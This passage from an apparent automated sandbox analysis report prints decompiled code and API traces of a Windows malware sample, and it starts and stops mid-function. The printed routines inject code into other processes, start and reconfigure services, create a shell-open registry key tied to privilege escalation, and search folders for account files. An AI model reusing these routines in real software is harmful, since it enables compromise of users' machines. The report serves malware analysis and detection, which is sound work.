				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x559cb4 = _t25;
				return _t25;
			}











                                  0x00413f99
                                  0x00413f9b
                                  0x00413fa9
                                  0x00413fb7
                                  0x00413fbc
                                  0x00413fca
                                  0x00413ff4
                                  0x00413ffe
                                  0x0041400c
                                  0x0041400f
                                  0x0041402a
                                  0x0041403c
                                  0x00414040
                                  0x0041404f
                                  0x00414057
                                  0x0041405e

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,74A313FB,00000000), ref: 00413F93
                                  • GetCurrentProcessId.KERNEL32 ref: 00413F9E
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00413FBC
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 00413FE6
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,00426208,00000800,00000000), ref: 00413FFE
                                  • VirtualProtectEx.KERNEL32(z?A,00000000,00000800,00000040,?), ref: 0041400F
                                  • VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 00414026
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,00000103,00000000), ref: 0041403C
                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0041404F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                  • String ID: z?A
                                  • API String ID: 900395357-4280446894
                                  • Opcode ID: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction ID: b1c18d8d0f2f4188799d6c91686f228e56c1b6c845ed563d7edeb039f8378cf2
                                  • Opcode Fuzzy Hash: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction Fuzzy Hash: A1216F71644218BEF7209B51DC4AFEB7F7CEB44720F2041B6B604AA0D0DAF46E408AA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D3A8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D3A8(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}








                                  0x0040d3b4
                                  0x0040d3b7
                                  0x0040d3bd
                                  0x0040d3c1
                                  0x0040d3d2
                                  0x0040d3d6
                                  0x0040d3ee
                                  0x0040d415
                                  0x0040d417
                                  0x0040d418
                                  0x0040d41f
                                  0x0040d422
                                  0x0040d424
                                  0x0040d426
                                  0x00000000
                                  0x0040d426
                                  0x0040d3fb
                                  0x00000000
                                  0x00000000
                                  0x0040d402
                                  0x0040d413
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d413
                                  0x0040d3d9
                                  0x0040d3df
                                  0x00000000
                                  0x0040d3df
                                  0x0040d42a

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D3B7
                                  • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D3CC
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D3D9
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D3E6
                                  • GetLastError.KERNEL32 ref: 0040D3F0
                                  • Sleep.KERNEL32(000007D0), ref: 0040D402
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D40B
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D41F
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D422
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                  • String ID: ServicesActive
                                  • API String ID: 104619213-3071072050
                                  • Opcode ID: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction ID: 984c0b14d8c5f8436b4892bcd3ae393994a7e81e733ff7ebf7d643affbd23cba
                                  • Opcode Fuzzy Hash: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction Fuzzy Hash: 87014F35B083657BD6211BB6AC8CE9B3E7DDBC9B51B014076FA05E2290CA78980586B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8FB, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E0040D8FB(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E00405FEB(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E00406045(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E004036F7( &_v12,  *_t91);
						if(E0040335A( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E00403549( &_v24, E004036F7( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E00405FEB(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E00405FEB(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E004036F7( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E004036F7(_t119,  *_t112);
										E0040221A(_t92 + 0x44,  &_v12);
									}
									E00405FEB(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0040D33C(_v32, 2);
							E0040D3A8(_v32);
							_v36 = 1;
							E00401099(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E00405FEB(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}


























                                  0x0040d906
                                  0x0040d910
                                  0x0040d913
                                  0x0040d916
                                  0x0040d919
                                  0x0040d91c
                                  0x0040d91f
                                  0x0040d928
                                  0x0040d92c
                                  0x0040d9dc
                                  0x0040d9dc
                                  0x0040d9e0
                                  0x0040d9e3
                                  0x0040d9ef
                                  0x0040d9ef
                                  0x0040d935
                                  0x0040d93c
                                  0x0040d93f
                                  0x0040d93f
                                  0x0040d949
                                  0x0040d959
                                  0x0040d95f
                                  0x0040d964
                                  0x0040d96b
                                  0x0040d975
                                  0x0040d982
                                  0x0040d98a
                                  0x00000000
                                  0x00000000
                                  0x0040d99a
                                  0x0040d9a0
                                  0x0040d9a5
                                  0x00000000
                                  0x00000000
                                  0x0040d9a7
                                  0x0040d9a9
                                  0x0040d9b3
                                  0x0040d9c5
                                  0x0040d9f0
                                  0x0040da02
                                  0x0040da0a
                                  0x0040da0f
                                  0x0040da19
                                  0x0040da1d
                                  0x0040da20
                                  0x0040da25
                                  0x0040da2d
                                  0x0040da70
                                  0x0040da73
                                  0x0040da77
                                  0x00000000
                                  0x00000000
                                  0x0040da7d
                                  0x0040da8c
                                  0x0040dac9
                                  0x0040dac9
                                  0x0040daca
                                  0x0040dacf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040dad1
                                  0x0040da93
                                  0x0040daa6
                                  0x0040daad
                                  0x0040dab5
                                  0x0040dab5
                                  0x0040dabd
                                  0x0040dac2
                                  0x0040dac6
                                  0x00000000
                                  0x0040dac6
                                  0x00000000
                                  0x0040da7d
                                  0x0040da35
                                  0x00000000
                                  0x00000000
                                  0x0040da3d
                                  0x0040da43
                                  0x0040da49
                                  0x0040da4c
                                  0x0040da61
                                  0x0040da65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040da6b
                                  0x0040d9ca
                                  0x0040d9cf
                                  0x0040d9d3
                                  0x0040d9d6
                                  0x0040d9da
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d9da
                                  0x00000000
                                  0x0040d9a9
                                  0x00000000

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040D922
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040D959
                                    • Part of subcall function 00406045: GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 00406048
                                    • Part of subcall function 00406045: RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 0040604F
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040D982
                                  • GetLastError.KERNEL32 ref: 0040D98C
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D99A
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DA5B
                                  • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DA9E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                  • String ID: ServicesActive
                                  • API String ID: 899334174-3071072050
                                  • Opcode ID: aa88f2381a8379f9ef7fbe07b50d8f823752e6264afa939dd2859f9f5f34ee48
                                  • Instruction ID: 4627b5c660ce4a60c95ced9edd5d001cb4fcdfcb4ede8c399349bdd6508d6144
                                  • Opcode Fuzzy Hash: aa88f2381a8379f9ef7fbe07b50d8f823752e6264afa939dd2859f9f5f34ee48
                                  • Instruction Fuzzy Hash: 85511CB1D00219AFDB15DFE1C896BEFBBB8AF18305F10017AE502B62D1DB785A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407D5E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97injectionmemorythreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00407D5E(void* __ecx, long __edx, long _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				signed int _t17;
				void* _t19;
				void* _t22;
				long _t32;
				_Unknown_base(*)()* _t38;
				void* _t40;

				_t32 = __edx;
				_v24 = __ecx;
				if( *0x426754 == 0) {
					 *0x426754 = E0040FB98() != 0;
				}
				_t17 = OpenProcess(0x1fffff, 0, _a4);
				_t40 = _t17;
				if(_t40 != 0) {
					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
					if(_t38 == 0) {
						L12:
						_push(0xfffffffe);
						L13:
						_pop(_t19);
						L14:
						return _t19;
					}
					_v16 = _v16 & 0x00000000;
					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
					_v20 = _t22;
					if(_t22 == 0) {
						goto L12;
					}
					_v8 = _v8 & 0x00000000;
					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
						L11:
						_push(0xfffffffd);
						goto L13;
					} else {
						_v12 = _v12 & 0x00000000;
						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
							goto L11;
						} else {
							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
							goto L14;
						}
					}
				} else {
					return _t17 | 0xffffffff;
				}
			}














                                  0x00407d6d
                                  0x00407d6f
                                  0x00407d72
                                  0x00407d7b
                                  0x00407d7b
                                  0x00407d8c
                                  0x00407d92
                                  0x00407d96
                                  0x00407db6
                                  0x00407dba
                                  0x00407e5f
                                  0x00407e5f
                                  0x00407e61
                                  0x00407e61
                                  0x00407e62
                                  0x00000000
                                  0x00407e62
                                  0x00407dc0
                                  0x00407dd1
                                  0x00407de9
                                  0x00407def
                                  0x00407df4
                                  0x00000000
                                  0x00000000
                                  0x00407df6
                                  0x00407e1b
                                  0x00407e5b
                                  0x00407e5b
                                  0x00000000
                                  0x00407e2d
                                  0x00407e2d
                                  0x00407e43
                                  0x00000000
                                  0x00407e4a
                                  0x00407e53
                                  0x00000000
                                  0x00407e53
                                  0x00407e43
                                  0x00407d98
                                  0x00000000
                                  0x00407d98

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407D8C
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407DB0
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407DD1
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407DE9
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407E13
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407E3B
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407E53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                  • String ID: XXXXXX
                                  • API String ID: 813767414-582547948
                                  • Opcode ID: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction ID: c495f5495fef9a669d461779a70b0afaaa39668d7629f65417ca4a490480110a
                                  • Opcode Fuzzy Hash: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction Fuzzy Hash: 26219371A49205BAEB2157A0DC05FBF7A7CAF44B55F2041B6FA10F11D0D7B8AE0086BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040955B, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040955B(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x426760, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x426760,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E00409244(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}









                                  0x0040957a
                                  0x0040957c
                                  0x0040959b
                                  0x004095b1
                                  0x004095b6
                                  0x004095b8
                                  0x004095c4
                                  0x004095e2
                                  0x004095f1
                                  0x004095fc
                                  0x004095fc
                                  0x0040960f
                                  0x004095b8
                                  0x00409619

                                  APIs
                                  • GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000), ref: 0040957C
                                  • PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                  • PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                  • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                    • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                    • Part of subcall function 00409244: GetLastError.KERNEL32 ref: 0040926E
                                    • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                  • String ID: .$Accounts\Account.rec0
                                  • API String ID: 3873318193-2526347284
                                  • Opcode ID: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction ID: bc3515f8d3d8780f40bb8a30baa7d5921dca78d5fe5a5665ce25a30cdb5b99d6
                                  • Opcode Fuzzy Hash: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction Fuzzy Hash: A71142B2A0022C6BDB20D7A4DC89FEB777CEB45714F5045E7E505E3181E7789E888E68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D33C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D33C(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}








                                  0x0040d348
                                  0x0040d34b
                                  0x0040d351
                                  0x0040d355
                                  0x0040d366
                                  0x0040d36a
                                  0x0040d38e
                                  0x0040d392
                                  0x0040d392
                                  0x0040d39a
                                  0x0040d39d
                                  0x0040d39f
                                  0x0040d36c
                                  0x0040d36d
                                  0x0040d373
                                  0x0040d373
                                  0x00000000
                                  0x0040d3a1
                                  0x0040d3a5

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D34B
                                  • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D360
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D36D
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D386
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID: ServicesActive
                                  • API String ID: 493672254-3071072050
                                  • Opcode ID: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction ID: 1675453761964aa3b76a2eaeb2c7b583256337f413fea86e2beca60fa8f39388
                                  • Opcode Fuzzy Hash: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction Fuzzy Hash: 3FF0FC3170432577C7211B76AC48EDB3F6CDBCA7707014232FA11E22D0CA74CC0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060B0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004060B0() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}




                                  0x004060c1
                                  0x004060c9
                                  0x004060dc
                                  0x004060dc
                                  0x004060e0

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004060B5
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004060C1
                                  • ExitProcess.KERNEL32 ref: 004060E0
                                  Strings
                                  • USER32.DLL, xrefs: 004060B0
                                  • MessageBoxA, xrefs: 004060BB
                                  • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004060D5
                                  • PureCall, xrefs: 004060D0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                  • API String ID: 881411216-4134947204
                                  • Opcode ID: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction ID: bd81d5c7f3da7a5dda9c96caca806214e81eb27f708d7e513293adb5dabf46c5
                                  • Opcode Fuzzy Hash: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction Fuzzy Hash: 04D0C2303C83016AE6103BA0AD4EF9636355B04B51F244962B605A51D1DAE99592D56D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412E91, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412E91() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}










                                  0x00412ea6
                                  0x00412f08
                                  0x00000000
                                  0x00412ebc
                                  0x00412ebf
                                  0x00412ec6
                                  0x00412ed0
                                  0x00412eea
                                  0x00412ef2
                                  0x00412f02
                                  0x00000000
                                  0x00412f02
                                  0x00412ef7
                                  0x00000000
                                  0x00412efd

                                  APIs
                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412E9E
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412EB2
                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00413187,?), ref: 00412EEA
                                  • RegCloseKey.ADVAPI32(00413187), ref: 00412EF7
                                  • SetLastError.KERNEL32(00000000), ref: 00412F02
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412EE0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1473660444-2536721355
                                  • Opcode ID: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction ID: 82a2526e36d2d6463d42065251312d8bdf4d9f0b426d0c692092d159b657fe2b
                                  • Opcode Fuzzy Hash: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction Fuzzy Hash: C5011A71905228AADF209BA19D49FDFBFBDEF09750F004122FA05F2140D7B49685DAA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C419, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                  • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                  • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                  • String ID: AES$ChainingMode$ChainingModeGCM
                                  • API String ID: 1692524283-1213888626
                                  • Opcode ID: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction ID: c2b106cd844a06e10b1a571c349fc797866018eb450a69ea0d76d9719a4b7e57
                                  • Opcode Fuzzy Hash: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction Fuzzy Hash: 2FF06871345325BFDB240B56DC49ED7BFACEF5AB91B10413AF905E1150D6B15C00D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C6BD, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040C6BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v10;
				char _v12;
				long _v16;
				char _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				void* _t36;
				long _t50;
				void* _t54;
				int _t61;
				void* _t63;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t63 = __ecx;
				_t73 = __edx;
				_v12 = 0x3176;
				_v10 = 0x30;
				_t75 = __ecx;
				if(__edx < 3) {
					L8:
